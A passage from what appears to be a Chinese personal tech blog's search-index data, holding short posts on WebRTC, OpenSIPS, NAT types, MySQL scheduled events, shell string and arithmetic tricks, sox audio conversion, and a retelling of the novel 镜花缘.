中间部分为音视频引擎。音频引擎负责音频采集和传输,具有降噪、回声消除等功能。视频引擎负责网络抖动优化,互联网传输编解码优化 在音视频引擎之上是 一套 C++ API,在 C++ 的 API 之上是提供给浏览器的Javascript API WebRTC 底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的 其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制 DTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释 ICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) 浏览器和某些非浏览器之间的呼叫,有些时候以为没有DTLS指纹,而导致呼叫失败。如下图使用JsSIP, 一个sipPhone和WebRTC之间的呼叫,因为没有携带DTLS指纹而导致呼叫失败。","title":"WebRTC简介"},{"content":"目前在做基于WebRTC的语音和视频终端,语音和视频通话的质量都不错。感谢WebRTC,站在巨人的肩膀上,我们可以看得更远。\nWebRTC浏览器兼容性 github demos 下面两个都是github项目,项目中有各种WebRTC的demo。除了demo之外,这两个项目的issuese也是非常值得看的,可以解决常见的问题\nhttps://webrtc.github.io/samples/ https://github.com/muaz-khan/WebRTC-Experiment 相关资料网站 webrtc官网: https://webrtc.org/ webrtchacks: https://webrtchacks.com/ webrtc官网: https://webrtc.org.cn/ webrtc安全相关: http://webrtc-security.github.io/ webrtc谷歌开发者教程: https://codelabs.developers.google.com/codelabs/webrtc-web/ sdp for webrtc https://tools.ietf.org/id/draft-nandakumar-rtcweb-sdp-01.html 各种资料 https://webrtc.org/start/ https://www.w3.org/TR/webrtc/ 浏览器内核 webkit官网:https://webkit.org/ WebRTC相关库 webrtc-adapter https://github.com/webrtchacks/adapter WebRTC周边js库 库 地址 Addlive http://www.addlive.com/platform-overview/ Apidaze https://developers.apidaze.io/webrtc Bistri http://developers.bistri.com/webrtc-sdk/#js-sdk Crocodile https://www.crocodilertc.net/documentation/javascript/ EasyRTC http://www.easyrtc.com/docs/ Janus http://janus.conf.meetecho.com/docs/JS.html JsSIP http://jssip.net/documentation/ Openclove http://developer.openclove.com/docs/read/ovxjs_api_doc Oracle http://docs.oracle.com/cd/E40972_01/doc.70/e49239/index.html Peerjs http://peerjs.com/docs/#api Phono http://phono.com/docs Plivo https://plivo.com/docs/sdk/web/ Pubnub http://www.pubnub.com/docs/javascript/javascript-sdk.html Quobis https://quobis.atlassian.net/wiki/display/QoffeeSIP/API SimpleWebRTC from \u0026amp;Yet http://simplewebrtc.com/ SIPML5 http://sipml5.org/docgen/symbols/SIPml.html TenHands https://www.tenhands.net/developer/docs.htm TokBox http://tokbox.com/opentok Twilio http://www.twilio.com/client/api Voximplant http://voximplant.com/docs/references/websdk/ Vline https://vline.com/developer/docs/vline.js/ Weemo http://docs.weemo.com/js/ Xirsys http://xirsys.com/_static_content/xirsys.com/docs/ Xsockets.net http://xsockets.net/docs/javascript-client-api VoIP/PSTN https://kamailio.org https://freeswitch.org/ 值得关注的人 https://github.com/muaz-khan https://github.com/chadwallacehart https://github.com/fippo WebRTC主题 github上webrtc主题相关的仓库,干货非常多 https://github.com/topics/webrtc\n相关文章 guide-to-safari-webrtc WebKit: On the Road to WebRTC 1.0, Including VP8 whats-in-a-webrtc-javascript-library ","permalink":"https://wdd.js.org/opensips/ch9/webrtc-ref/","summary":"目前在做基于WebRTC的语音和视频终端,语音和视频通话的质量都不错。感谢WebRTC,站在巨人的肩膀上,我们可以看得更远。\nWebRTC浏览器兼容性 github demos 下面两个都是github项目,项目中有各种WebRTC的demo。除了demo之外,这两个项目的issuese也是非常值得看的,可以解决常见的问题\nhttps://webrtc.github.io/samples/ https://github.com/muaz-khan/WebRTC-Experiment 相关资料网站 webrtc官网: https://webrtc.org/ webrtchacks: https://webrtchacks.com/ webrtc官网: https://webrtc.org.cn/ webrtc安全相关: http://webrtc-security.github.io/ webrtc谷歌开发者教程: https://codelabs.developers.google.com/codelabs/webrtc-web/ sdp for webrtc https://tools.ietf.org/id/draft-nandakumar-rtcweb-sdp-01.html 各种资料 https://webrtc.org/start/ https://www.w3.org/TR/webrtc/ 浏览器内核 webkit官网:https://webkit.org/ WebRTC相关库 webrtc-adapter https://github.com/webrtchacks/adapter WebRTC周边js库 库 地址 Addlive http://www.addlive.com/platform-overview/ Apidaze https://developers.apidaze.io/webrtc Bistri http://developers.bistri.com/webrtc-sdk/#js-sdk Crocodile https://www.crocodilertc.net/documentation/javascript/ EasyRTC http://www.easyrtc.com/docs/ Janus http://janus.conf.meetecho.com/docs/JS.html JsSIP http://jssip.net/documentation/ Openclove http://developer.openclove.com/docs/read/ovxjs_api_doc Oracle http://docs.oracle.com/cd/E40972_01/doc.70/e49239/index.html Peerjs http://peerjs.com/docs/#api Phono http://phono.com/docs Plivo https://plivo.com/docs/sdk/web/ Pubnub http://www.pubnub.com/docs/javascript/javascript-sdk.html Quobis https://quobis.atlassian.net/wiki/display/QoffeeSIP/API SimpleWebRTC from \u0026amp;Yet http://simplewebrtc.com/ SIPML5 http://sipml5.org/docgen/symbols/SIPml.html TenHands https://www.tenhands.net/developer/docs.htm TokBox http://tokbox.","title":"WebRTC学习资料分享"},{"content":"1. OpenSIPS架构 OpenSIPS主要有两部分构成,\ncore: 提供底层工具、接口、资源 module:模块是一些共享的库,在启动时按需加载。有些模块是用于在opensips脚本中提供功能,而有些模块是作为底层,为其他模块提供功能。 2. OpenSIP 核心 2.1. 传输层 传输层提供了对于各种协议的支持,如TCP、UDP、TLS、WebSocket\n2.2. SIP工厂层 SIP工厂层提供了对SIP协议的解析和构建。OpenSIPS实现了一种懒解析功能,懒解析的效率非常高。\n懒解析:懒解析就是只去解析SIP头,并不解析SIP头的字段内容。而是在需要读取头字段内容时,才去解析。所以可以理解为按需解析。有点类似于一些文件系统的写时复制功能。\n**惰性应用:**有一点非常重要,当你通过脚本提供的函数去改变SIP消息时,所作出的改变并不是实时作用到SIP消息上,而是在先存起来,而是当所有的SIP消息处理完成后才会去应用这些改变。举例来说,你首先通过函数给SIP消息添加了某个头,然后你通过函数去获取这个头的时,发现这个头并不存在,但是SIP消息再发送出去后,又携带了你添加的这个头。\n2.3. 路由脚本解析与执行 OpenSIPS在启动后,会将opensips.cfg解析并加载到内存中。一旦OpenSIPS正常运行了,opensips.cfg文件即使删了也不会影响到OpenSIPS的运行了。\n但是OpenSIPS并不支持热脚本更新,如果你改了脚本,让让运行的OpenSIPS具有添加的功能,那么必须将OpensSIPS重启。\nOpenSIPS的脚本有点类似于C或者Shell语言,如果你Shell写的很溜,OpenSIPS的脚本理解起来也会非常容易。\n2.4. 内存与锁管理 出于性能考虑,OpenSIPS自己内部实现了内存和锁的管理,这部分在内容在脚本中是不可见的。\n2.5. 脚本变量和脚本函数 OpenSIPS核心提供的脚本变量和函数比较有限,外围的模块提供和很多的变量和函数。这些变量和函数的存在,都是为了让你易于获取SIP消息的某些字段,或者对SIP消息进行修改。\n2.6. SQL接口类 OpenSIPS 核心实现了接口的定义,但是并没有实现接口。接口的实现由外部的模块提供,这样做的函数可以使用不同的数据库。\n2.7. MI管理接口 mi接口用来管理OpenSIPS, 可以实现以下功能\n向OpenSIPS 发送数据 从OpenSIPS 获取数据 触发OpenSIPS 的内部行为 ","permalink":"https://wdd.js.org/opensips/ch3/about-opensips/","summary":"1. OpenSIPS架构 OpenSIPS主要有两部分构成,\ncore: 提供底层工具、接口、资源 module:模块是一些共享的库,在启动时按需加载。有些模块是用于在opensips脚本中提供功能,而有些模块是作为底层,为其他模块提供功能。 2. OpenSIP 核心 2.1. 传输层 传输层提供了对于各种协议的支持,如TCP、UDP、TLS、WebSocket\n2.2. SIP工厂层 SIP工厂层提供了对SIP协议的解析和构建。OpenSIPS实现了一种懒解析功能,懒解析的效率非常高。\n懒解析:懒解析就是只去解析SIP头,并不解析SIP头的字段内容。而是在需要读取头字段内容时,才去解析。所以可以理解为按需解析。有点类似于一些文件系统的写时复制功能。\n**惰性应用:**有一点非常重要,当你通过脚本提供的函数去改变SIP消息时,所作出的改变并不是实时作用到SIP消息上,而是在先存起来,而是当所有的SIP消息处理完成后才会去应用这些改变。举例来说,你首先通过函数给SIP消息添加了某个头,然后你通过函数去获取这个头的时,发现这个头并不存在,但是SIP消息再发送出去后,又携带了你添加的这个头。\n2.3. 路由脚本解析与执行 OpenSIPS在启动后,会将opensips.cfg解析并加载到内存中。一旦OpenSIPS正常运行了,opensips.cfg文件即使删了也不会影响到OpenSIPS的运行了。\n但是OpenSIPS并不支持热脚本更新,如果你改了脚本,让让运行的OpenSIPS具有添加的功能,那么必须将OpensSIPS重启。\nOpenSIPS的脚本有点类似于C或者Shell语言,如果你Shell写的很溜,OpenSIPS的脚本理解起来也会非常容易。\n2.4. 内存与锁管理 出于性能考虑,OpenSIPS自己内部实现了内存和锁的管理,这部分在内容在脚本中是不可见的。\n2.5. 脚本变量和脚本函数 OpenSIPS核心提供的脚本变量和函数比较有限,外围的模块提供和很多的变量和函数。这些变量和函数的存在,都是为了让你易于获取SIP消息的某些字段,或者对SIP消息进行修改。\n2.6. SQL接口类 OpenSIPS 核心实现了接口的定义,但是并没有实现接口。接口的实现由外部的模块提供,这样做的函数可以使用不同的数据库。\n2.7. MI管理接口 mi接口用来管理OpenSIPS, 可以实现以下功能\n向OpenSIPS 发送数据 从OpenSIPS 获取数据 触发OpenSIPS 的内部行为 ","title":"opensips介绍"},{"content":"从MySql5.1.6增加计划任务功能\n判断计划任务是否启动 SHOW VARIABLES LIKE \u0026#39;event_scheduler\u0026#39; 开启计划任务 set global event_scheduler=on 创建计划任务 create test_e on scheduler every 1 day do sql 修改计划任务 # 临时关闭事件 ALTER EVENT e_test DISABLE; # 开启事件 ALTER EVENT e_test ENABLE; # 将每天清空test表改为5天清空一次 ALTER EVENT e_test ON SCHEDULE EVERY 5 DAY; 删除计划任务 drop event e_test ","permalink":"https://wdd.js.org/posts/2019/11/xss1vk/","summary":"从MySql5.1.6增加计划任务功能\n判断计划任务是否启动 SHOW VARIABLES LIKE \u0026#39;event_scheduler\u0026#39; 开启计划任务 set global event_scheduler=on 创建计划任务 create test_e on scheduler every 1 day do sql 修改计划任务 # 临时关闭事件 ALTER EVENT e_test DISABLE; # 开启事件 ALTER EVENT e_test ENABLE; # 将每天清空test表改为5天清空一次 ALTER EVENT e_test ON SCHEDULE EVERY 5 DAY; 删除计划任务 drop event e_test ","title":"Mysql计划任务:Event Scheduler"},{"content":" NAT的产生原因是IPv4的地址不够用,网络中的部分主机只能公用一个外网IP。 NAT工作在网络层和传输层,主要是对IP地址和端口号的改变 NAT的优点 节约公网IP 安全性更好,所有流量都需要经过入口的防火墙 NAT的缺点 对于UPD应用不够友好 NAT 工作原理 内部的设备X, 经过NAT设备后,NAT设备会改写源IP和端口 NAT 类型 1. 全锥型 每个内部主机都有一个静态绑定的外部ip:port 任何主机发往NAT设备上特定ip:port的包,都会被转发给绑定的主机 这种方式的缺点很明显,黑客可以使用端口扫描工具,扫描出暴露的端口,然后通过这个端口攻击内部主机 在内部主机没有往外发送流量时,外部流量也能够进入内部主机 -\n2. 限制锥形 NAT上的ip:port与内部主机是动态绑定的 如果内部主机没有向某个主机先发送过包,那么NAT会拒绝外部主机进入的流量 3. 端口限制型 端口限制型除了有限制锥型的要求外,还增加了端口的限制 4. 对称型 对称型最难穿透,因为每次交互NAT都会使用不同的端口号,所以内外网端口映射根本无法预测 NAT对比表格 NAT类型 收数据前是否需要先发送数据 是否能够预测下一次的NAT打开的端口对 是否限制包的目的ip:port 全锥形 否 是 否 限制锥形 是 是 仅限制IP 端口限制型 是 是 是 对称型 是 否 是 ","permalink":"https://wdd.js.org/opensips/ch1/deep-in-nat/","summary":" NAT的产生原因是IPv4的地址不够用,网络中的部分主机只能公用一个外网IP。 NAT工作在网络层和传输层,主要是对IP地址和端口号的改变 NAT的优点 节约公网IP 安全性更好,所有流量都需要经过入口的防火墙 NAT的缺点 对于UPD应用不够友好 NAT 工作原理 内部的设备X, 经过NAT设备后,NAT设备会改写源IP和端口 NAT 类型 1. 全锥型 每个内部主机都有一个静态绑定的外部ip:port 任何主机发往NAT设备上特定ip:port的包,都会被转发给绑定的主机 这种方式的缺点很明显,黑客可以使用端口扫描工具,扫描出暴露的端口,然后通过这个端口攻击内部主机 在内部主机没有往外发送流量时,外部流量也能够进入内部主机 -\n2. 限制锥形 NAT上的ip:port与内部主机是动态绑定的 如果内部主机没有向某个主机先发送过包,那么NAT会拒绝外部主机进入的流量 3. 端口限制型 端口限制型除了有限制锥型的要求外,还增加了端口的限制 4. 对称型 对称型最难穿透,因为每次交互NAT都会使用不同的端口号,所以内外网端口映射根本无法预测 NAT对比表格 NAT类型 收数据前是否需要先发送数据 是否能够预测下一次的NAT打开的端口对 是否限制包的目的ip:port 全锥形 否 是 否 限制锥形 是 是 仅限制IP 端口限制型 是 是 是 对称型 是 否 是 ","title":"深入NAT网络"},{"content":"如果你仅仅是本地运行OpenSIPS, 你可以不用管什么对外公布地址。但是如果你的SIP服务器想在公网环境提供服务,则必然要深刻的理解对外公布地址。\n在一个集群中,可能有多台SIP服务器,例如如下图的网络架构中\nregister 负责注册相关的业务 192.168.1.100(内网) uas 负责呼叫相关的业务 192.168.1.101(内网) entry 负责接入 192.168.1.102(内网),1.2.3.4(公网地址) 一般情况下,register和uas只有内外地址,没有公网地址。而entry既有内网地址,也有公网地址。公网地址一般是由云服务提供商分配的。\n我们希望内部网络register和uas以及entry必须使用内网通信,而entry和互联网使用公网通信。\n有时候经常遇到的问题就是某个请求,例如INVITE, uas从内网地址发送到了entry的公网地址上,这时候就可能产生一些列的奇葩问题。\n如何设置公布地址 listen as listen = udp:192.168.1.102:5060 as 1.2.3.4:5060 在listen 的参数上直接配置公布地址。好处的方便,后续如果调用record_route()或者add_path_received(), OpenSIPS会自动帮你选择对外公布地址。\n但是,OpenSIPS选择可能并不是我们想要的。\n例如: INVITE请求从内部发送到互联网,这时OpenSIPS能正常设置对外公布地址。但是如果请求从外表进入内部,OpenSIPS可能还是会用公网地址作为对外公布地址。\n所以,listen as虽然方便,但不够灵活。\nset_advertised_address() 和 set_advertised_port(int) set_advertised_address和set_advertised_port属于OpenSIPS和核心函数部分,可以在脚本里根据不同条件,灵活的设置公布地址。\n例如:\nif 请求发生到公网 { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ⚠️ 如果你选择用set_advertised_address和set_advertised_port来手动设置,就千万不要用as了。\n几个注意点SIP头 record_route头 Path头 上面的两个头,在OpenSIPS里可以用下面的函数去设置。设置的时候,务必要主义选择合适的网络地址。否者请求将会不回按照你期望方式发送。\nrecord_route record_route_preset add_path add_path_received ","permalink":"https://wdd.js.org/opensips/ch5/adv-address/","summary":"如果你仅仅是本地运行OpenSIPS, 你可以不用管什么对外公布地址。但是如果你的SIP服务器想在公网环境提供服务,则必然要深刻的理解对外公布地址。\n在一个集群中,可能有多台SIP服务器,例如如下图的网络架构中\nregister 负责注册相关的业务 192.168.1.100(内网) uas 负责呼叫相关的业务 192.168.1.101(内网) entry 负责接入 192.168.1.102(内网),1.2.3.4(公网地址) 一般情况下,register和uas只有内外地址,没有公网地址。而entry既有内网地址,也有公网地址。公网地址一般是由云服务提供商分配的。\n我们希望内部网络register和uas以及entry必须使用内网通信,而entry和互联网使用公网通信。\n有时候经常遇到的问题就是某个请求,例如INVITE, uas从内网地址发送到了entry的公网地址上,这时候就可能产生一些列的奇葩问题。\n如何设置公布地址 listen as listen = udp:192.168.1.102:5060 as 1.2.3.4:5060 在listen 的参数上直接配置公布地址。好处的方便,后续如果调用record_route()或者add_path_received(), OpenSIPS会自动帮你选择对外公布地址。\n但是,OpenSIPS选择可能并不是我们想要的。\n例如: INVITE请求从内部发送到互联网,这时OpenSIPS能正常设置对外公布地址。但是如果请求从外表进入内部,OpenSIPS可能还是会用公网地址作为对外公布地址。\n所以,listen as虽然方便,但不够灵活。\nset_advertised_address() 和 set_advertised_port(int) set_advertised_address和set_advertised_port属于OpenSIPS和核心函数部分,可以在脚本里根据不同条件,灵活的设置公布地址。\n例如:\nif 请求发生到公网 { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ⚠️ 如果你选择用set_advertised_address和set_advertised_port来手动设置,就千万不要用as了。\n几个注意点SIP头 record_route头 Path头 上面的两个头,在OpenSIPS里可以用下面的函数去设置。设置的时候,务必要主义选择合适的网络地址。否者请求将会不回按照你期望方式发送。\nrecord_route record_route_preset add_path add_path_received ","title":"【必读】深入对外公布地址"},{"content":"下面的日志是打印出socket.io断开的信息\n// bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 但是这条日志不利于关键词搜索,如果搜disconnect,那么可能很多地方都有这个关键词。\n// good logger.info(`socket.io disconnect ${socket.handshake.query.agentId} reason: ${reason} ${socket.id}`) // bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 总结经验\n多个关键词位置要靠前 多个关键词要集中 日志日志要标记来自特殊的用于,比如说,来自 ","permalink":"https://wdd.js.org/posts/2019/11/xa694b/","summary":"下面的日志是打印出socket.io断开的信息\n// bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 但是这条日志不利于关键词搜索,如果搜disconnect,那么可能很多地方都有这个关键词。\n// good logger.info(`socket.io disconnect ${socket.handshake.query.agentId} reason: ${reason} ${socket.id}`) // bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 总结经验\n多个关键词位置要靠前 多个关键词要集中 日志日志要标记来自特殊的用于,比如说,来自 ","title":"打印易于提取关键词的日志"},{"content":" 五大单元 输入单元 CPU:算术,逻辑,内存 输出单元 指令集 精简指令集 福仔指令集 ","permalink":"https://wdd.js.org/posts/2019/11/qy6ugu/","summary":" 五大单元 输入单元 CPU:算术,逻辑,内存 输出单元 指令集 精简指令集 福仔指令集 ","title":"Linux私房菜"},{"content":"《镜花缘》是清代李汝珍写的一部长篇小说,小说前半部分是主角游历海外各国的清代经历,有点像日本动漫海贼王。后半部分比较无趣,略过不提。\n单讲小说的前半部分,小说发生在唐代,主角叫做唐敖,本来科举中了探花,但是因为他和讨伐武则天的徐敬业有结拜之交,被人告发,遂革去了探花,降为秀才。\n唐敖心灰意冷,煮熟的鸭子就这么飞了。于是决定舍弃功名,游历山水。正好他的妹夫,林之洋是个跑远洋贸易的。\n唐敖正好搭上了妹夫的顺风船,环游世界之旅就这么开始了!!\n1. 君子国 君子国讲究好让不正,惟善为宝。说的是这个国家的人啊,素质非常高,高到什么地步呢?高到有点反人类。\n下面的一个场景,是我从小说中简化的一个场景:\n买家说:老板,你的东西质量真好,价格却那么低,如果我买了去,我内心会不安的。跪求你抬高些价格,我才买,不然我就不买了。\n店铺老板说:我要的价格这么高,已经觉得过意不去了,如果你还让我涨价,还你还是去别的地方买东西吧。\n买家说:既然你不愿意涨价,那也行,我还按照这个价格买你的东西,但是我只拿一半东西走。\n是不是很反人类,从来只见过买家想要压低价格的,还未听说过买家想抬高价格的。\n2. 大人国 此处的大人国,并不是说他们的身材巨大,而是形容他们国人的品格高大。他们都是争相做善事,不作恶事。\n除此以外,在他们的国家,很容易区分好人和坏人。他们所有的人脚下都踩着云。光明正大的人,脚下是彩云;经常做坏事的人,脚下是黑云。\n云的色彩会随着人的品行而变化,坏人如果能够向善,足下也会产生彩云。\n有些大官人,不希望别人看到他们脚下云的颜色,所以会用布裹上,但是这样做岂不是掩耳盗铃吗?\n3. 黑齿国 这个国家的人全身通黑,连牙齿都是黑的。我怀疑作者是不是去过非洲,但是非洲人的牙齿往往都是白色的。\n但是人不可貌相,黑齿国的人非常喜欢读书,个个都是满腹经纶。而且这个地方的小偷,只会偷书,却不偷金银宝物。\n4. 劳民国 该国的人也是面色墨黑,走路都是摇摇晃晃,终日忙忙碌碌。但是呢,这个国家的人每个都是长寿。\n5. 聂耳国 聂耳国的耳朵很长,长耳及腰,走路都需要用手去捧着耳朵。更有甚者,耳朵及地。\n除了耳朵长的这个特点之外,有的人耳朵也特别大。据说可以一个耳朵当床垫,一个耳朵当棉被,睡在自己的耳朵里。\n6. 无肠国 这个国家的人都没有肠子,无论吃喝什么东西,都会立即排出体外。所以他们在吃饭之前,都先找好厕所,不然就变成随地大小便了。\n更为恶心的是,因为他们吃的快也拉的快,很多食物都没有消化完全。所以有些人就把拉出来的便便收集起来,再给其他人吃。\n7. 鬼国 国人夜晚不睡觉,颠倒白天黑夜,行为似鬼。\n8. 毛民国 国人一身长毛,据说是上一世太为吝啬,一毛不拔。所以阎王让他下一世出生在毛民国,让他们满身长满毛。\n9. 无继国 国人从不生育,也没有孩子。而且他们也不区分男女。\n之所以他们国家的人口没有减少,是因为人死后120年之后还会再次复活。\n所以他们都是死了又活,活了有死。\n10. 深目国 他们脸上没有眼睛,他们的两个眼睛都长在自己的手掌里。是不是觉得似曾相识呢?火影里面的我爱罗。\n","permalink":"https://wdd.js.org/posts/2019/10/zfn92c/","summary":"《镜花缘》是清代李汝珍写的一部长篇小说,小说前半部分是主角游历海外各国的清代经历,有点像日本动漫海贼王。后半部分比较无趣,略过不提。\n单讲小说的前半部分,小说发生在唐代,主角叫做唐敖,本来科举中了探花,但是因为他和讨伐武则天的徐敬业有结拜之交,被人告发,遂革去了探花,降为秀才。\n唐敖心灰意冷,煮熟的鸭子就这么飞了。于是决定舍弃功名,游历山水。正好他的妹夫,林之洋是个跑远洋贸易的。\n唐敖正好搭上了妹夫的顺风船,环游世界之旅就这么开始了!!\n1. 君子国 君子国讲究好让不正,惟善为宝。说的是这个国家的人啊,素质非常高,高到什么地步呢?高到有点反人类。\n下面的一个场景,是我从小说中简化的一个场景:\n买家说:老板,你的东西质量真好,价格却那么低,如果我买了去,我内心会不安的。跪求你抬高些价格,我才买,不然我就不买了。\n店铺老板说:我要的价格这么高,已经觉得过意不去了,如果你还让我涨价,还你还是去别的地方买东西吧。\n买家说:既然你不愿意涨价,那也行,我还按照这个价格买你的东西,但是我只拿一半东西走。\n是不是很反人类,从来只见过买家想要压低价格的,还未听说过买家想抬高价格的。\n2. 大人国 此处的大人国,并不是说他们的身材巨大,而是形容他们国人的品格高大。他们都是争相做善事,不作恶事。\n除此以外,在他们的国家,很容易区分好人和坏人。他们所有的人脚下都踩着云。光明正大的人,脚下是彩云;经常做坏事的人,脚下是黑云。\n云的色彩会随着人的品行而变化,坏人如果能够向善,足下也会产生彩云。\n有些大官人,不希望别人看到他们脚下云的颜色,所以会用布裹上,但是这样做岂不是掩耳盗铃吗?\n3. 黑齿国 这个国家的人全身通黑,连牙齿都是黑的。我怀疑作者是不是去过非洲,但是非洲人的牙齿往往都是白色的。\n但是人不可貌相,黑齿国的人非常喜欢读书,个个都是满腹经纶。而且这个地方的小偷,只会偷书,却不偷金银宝物。\n4. 劳民国 该国的人也是面色墨黑,走路都是摇摇晃晃,终日忙忙碌碌。但是呢,这个国家的人每个都是长寿。\n5. 聂耳国 聂耳国的耳朵很长,长耳及腰,走路都需要用手去捧着耳朵。更有甚者,耳朵及地。\n除了耳朵长的这个特点之外,有的人耳朵也特别大。据说可以一个耳朵当床垫,一个耳朵当棉被,睡在自己的耳朵里。\n6. 无肠国 这个国家的人都没有肠子,无论吃喝什么东西,都会立即排出体外。所以他们在吃饭之前,都先找好厕所,不然就变成随地大小便了。\n更为恶心的是,因为他们吃的快也拉的快,很多食物都没有消化完全。所以有些人就把拉出来的便便收集起来,再给其他人吃。\n7. 鬼国 国人夜晚不睡觉,颠倒白天黑夜,行为似鬼。\n8. 毛民国 国人一身长毛,据说是上一世太为吝啬,一毛不拔。所以阎王让他下一世出生在毛民国,让他们满身长满毛。\n9. 无继国 国人从不生育,也没有孩子。而且他们也不区分男女。\n之所以他们国家的人口没有减少,是因为人死后120年之后还会再次复活。\n所以他们都是死了又活,活了有死。\n10. 深目国 他们脸上没有眼睛,他们的两个眼睛都长在自己的手掌里。是不是觉得似曾相识呢?火影里面的我爱罗。","title":"带你领略镜花缘中的神奇国度"},{"content":"主要的数据运算方式\nlet (()) [] expr bc 使用 let 使用 let 时,等号右边的变量不需要在加上$符号\n#!/bin/bash no1=1; no2=2; # 注意两个变量的值的类型实际上是字符串 re1=$no1+$no2 # 注意此时re1的值是1+2 let result=no1+no2 # 此时才是想获取的两数字的和,3 ","permalink":"https://wdd.js.org/shell/match-eval/","summary":"主要的数据运算方式\nlet (()) [] expr bc 使用 let 使用 let 时,等号右边的变量不需要在加上$符号\n#!/bin/bash no1=1; no2=2; # 注意两个变量的值的类型实际上是字符串 re1=$no1+$no2 # 注意此时re1的值是1+2 let result=no1+no2 # 此时才是想获取的两数字的和,3 ","title":"shell数学运算"},{"content":"获取字符串长度 需要在变量前加个**#**\nname=wdd echo ${#name} 首尾去空格 echo \u0026#34; abcd \u0026#34; | xargs 字符串包含 # $var是否包含字符串A if [[ $var =~ \u0026#34;A\u0026#34; ]]; then echo fi # $var是否以字符串A开头 if [[ $var =~ \u0026#34;^A\u0026#34; ]]; then echo fi # $var是否以字符串A结尾 if [[ $var =~ \u0026#34;A$\u0026#34; ]]; then echo fi 字符串提取 #!/bin/bash num1=${test#*_} num2=${num1#*_} surname=${num2%_*} num4=${test##*_} profession=${num4%.*} #*_ 从左边开始,去第一个符号“_”左边的所有字符 % _* 从右边开始,去掉第一个符号“_”右边的所有字符 ##*_ 从右边开始,去掉第一个符号“_”左边的所有字符 %%_* 从左边开始,去掉第一个符号“_”右边的所有字符 判断某个字符串是否以特定字符开头 if [[ $TAG =~ ABC* ]]; then echo $TAG is begin with ABC fi ","permalink":"https://wdd.js.org/shell/string-operator/","summary":"获取字符串长度 需要在变量前加个**#**\nname=wdd echo ${#name} 首尾去空格 echo \u0026#34; abcd \u0026#34; | xargs 字符串包含 # $var是否包含字符串A if [[ $var =~ \u0026#34;A\u0026#34; ]]; then echo fi # $var是否以字符串A开头 if [[ $var =~ \u0026#34;^A\u0026#34; ]]; then echo fi # $var是否以字符串A结尾 if [[ $var =~ \u0026#34;A$\u0026#34; ]]; then echo fi 字符串提取 #!/bin/bash num1=${test#*_} num2=${num1#*_} surname=${num2%_*} num4=${test##*_} profession=${num4%.*} #*_ 从左边开始,去第一个符号“_”左边的所有字符 % _* 从右边开始,去掉第一个符号“_”右边的所有字符 ##*_ 从右边开始,去掉第一个符号“_”左边的所有字符 %%_* 从左边开始,去掉第一个符号“_”右边的所有字符 判断某个字符串是否以特定字符开头 if [[ $TAG =~ ABC* ]]; then echo $TAG is begin with ABC fi ","title":"字符串操作"},{"content":"ab安装 apt-get install apache2-utils ","permalink":"https://wdd.js.org/posts/2019/10/pbv6ok/","summary":"ab安装 apt-get install apache2-utils ","title":"接口压力测试"},{"content":"apt-get install sox libsox-fmt-mp3 -y sox input.vox output.mp3 sox支持命令 ➜ vox sox --help sox: SoX v14.4.1 Usage summary: [gopts] [[fopts] infile]... [fopts] outfile [effect [effopt]]... SPECIAL FILENAMES (infile, outfile): - Pipe/redirect input/output (stdin/stdout); may need -t -d, --default-device Use the default audio device (where available) -n, --null Use the `null\u0026#39; file handler; e.g. with synth effect -p, --sox-pipe Alias for `-t sox -\u0026#39; SPECIAL FILENAMES (infile only): \u0026#34;|program [options] ...\u0026#34; Pipe input from external program (where supported) http://server/file Use the given URL as input file (where supported) GLOBAL OPTIONS (gopts) (can be specified at any point before the first effect): --buffer BYTES Set the size of all processing buffers (default 8192) --clobber Don\u0026#39;t prompt to overwrite output file (default) --combine concatenate Concatenate all input files (default for sox, rec) --combine sequence Sequence all input files (default for play) -D, --no-dither Don\u0026#39;t dither automatically --effects-file FILENAME File containing effects and options -G, --guard Use temporary files to guard against clipping -h, --help Display version number and usage information --help-effect NAME Show usage of effect NAME, or NAME=all for all --help-format NAME Show info on format NAME, or NAME=all for all --i, --info Behave as soxi(1) --input-buffer BYTES Override the input buffer size (default: as --buffer) --no-clobber Prompt to overwrite output file -m, --combine mix Mix multiple input files (instead of concatenating) --combine mix-power Mix to equal power (instead of concatenating) -M, --combine merge Merge multiple input files (instead of concatenating) --magic Use `magic\u0026#39; file-type detection --multi-threaded Enable parallel effects channels processing --norm Guard (see --guard) \u0026amp; normalise --play-rate-arg ARG Default `rate\u0026#39; argument for auto-resample with `play\u0026#39; --plot gnuplot|octave Generate script to plot response of filter effect -q, --no-show-progress Run in quiet mode; opposite of -S --replay-gain track|album|off Default: off (sox, rec), track (play) -R Use default random numbers (same on each run of SoX) -S, --show-progress Display progress while processing audio data --single-threaded Disable parallel effects channels processing --temp DIRECTORY Specify the directory to use for temporary files -T, --combine multiply Multiply samples of corresponding channels from all input files (instead of concatenating) --version Display version number of SoX and exit -V[LEVEL] Increment or set verbosity level (default 2); levels: 1: failure messages 2: warnings 3: details of processing 4-6: increasing levels of debug messages FORMAT OPTIONS (fopts): Input file format options need only be supplied for files that are headerless. Output files will have the same format as the input file where possible and not overriden by any of various means including providing output format options. -v|--volume FACTOR Input file volume adjustment factor (real number) 